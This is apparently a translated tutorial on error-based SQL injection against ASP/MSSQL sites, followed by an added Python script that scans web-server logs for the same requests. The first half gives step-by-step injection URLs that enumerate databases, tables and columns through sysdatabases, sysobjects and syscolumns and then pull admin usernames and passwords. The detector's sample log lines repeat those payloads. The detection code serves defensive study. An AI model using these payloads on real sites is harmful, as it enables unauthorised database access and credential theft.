I read over the cross-database query notes that I wrote and sorted out the general steps, from exposing the database names to exposing the password, to make the idea clearer.
SQL injection is flexible and changeable, and the injection statements differ from case to case. Only the general steps are given below; I hope they help you.
1: Expose all database names
http://www.xxx.com/xxx.asp?id=1 and 0<>(select count(*)
from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = ..., 9, ... in turn to get more database names.
2: Expose the tables in a database
If a bbs database exists, submit the following statement:
http://www.xxx.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U')
This returns one table name. Assume it is admin.
Submit:
http://www.xxx.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U' and name not in
('admin'))
to obtain the other tables.
3: Expose the fields in a table
Submit:
http://www.xxx.com/xxx.asp?id=1 and 0<>(select count(*)
from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id)))
Assume that the UID value obtained is 18779569 (uid = id).
Submit:
http://www.xxx.com/xxx.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.syscolumns where id=18779569)
This returns one field of the admin table; assume it is user_id.
Submit:
http://www.xxx.com/xxx.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...))
to expose the other fields.
4: Expose the username and password
If fields such as user_id, username and password exist, submit:
http://www.xxx.com/xxx.asp?id=1 and 0<(select user_id from
BBS.dbo.admin where username>1)
This returns the user name.
The password can then be obtained in turn.
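
Seen from the defending side, every request in steps 1 to 4 splices a parenthesised subquery into a numeric id parameter, and steps 1 to 3 name the catalog tables sysdatabases, sysobjects or syscolumns. The following Python code is an added example, not part of the original post; it scans web-server log lines for that shape. The log field order, the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# System catalog tables queried in steps 1-3 of this page.
CATALOG = re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I)
# Parenthesised subquery spliced into a parameter value (all four steps).
SUBSELECT = re.compile(r"\(\s*select\b", re.I)
# Numeric value followed by boolean glue, e.g. "1 and 0<>(".
NUM_GLUE = re.compile(r"^\s*\d+\s+(?:and|or)\b", re.I)

def inspect_query(query):
    """Return {param: [reasons]} for suspicious parameters in a raw query string."""
    findings = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote_plus(value)  # second decoding pass catches double encoding
        # Treat SQL comments and whitespace runs as plain spacing.
        value = re.sub(r"/\*.*?\*/|\s+", " ", value)
        reasons = []
        hit = CATALOG.search(value)
        if hit:
            reasons.append("catalog:" + hit.group(1).lower())
        if SUBSELECT.search(value):
            reasons.append("subselect")
        if NUM_GLUE.search(value):
            reasons.append("numeric+boolean")
        if hit or len(reasons) >= 2:  # catalog name alone, or two signals
            findings[name] = reasons
    return findings

def scan_log(lines):
    """Assumed field order: date time method uri-stem uri-query status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        found = inspect_query(fields[4])
        if found:
            hits.append((fields[3], fields[5], found))
    return hits

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-05-01 10:00:01 GET /xxx.asp id=1 200",
    "2024-05-01 10:00:07 GET /xxx.asp id=1+and+0<>(select+count(*)+from+master.dbo.sysdatabases+where+name>1+and+dbid=6) 500",
    "2024-05-01 10:00:09 GET /jump.asp id=1%20and%200%3C%3E(select%20top%201%20name%20from%20bbs.dbo.sysobjects%20where%20xtype=%27U%27) 500",
    "2024-05-01 10:00:12 GET /search.asp q=select+a+table+and+chairs 200",
]
if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Detection of this kind complements, and does not replace, binding id as a typed parameter in the application code.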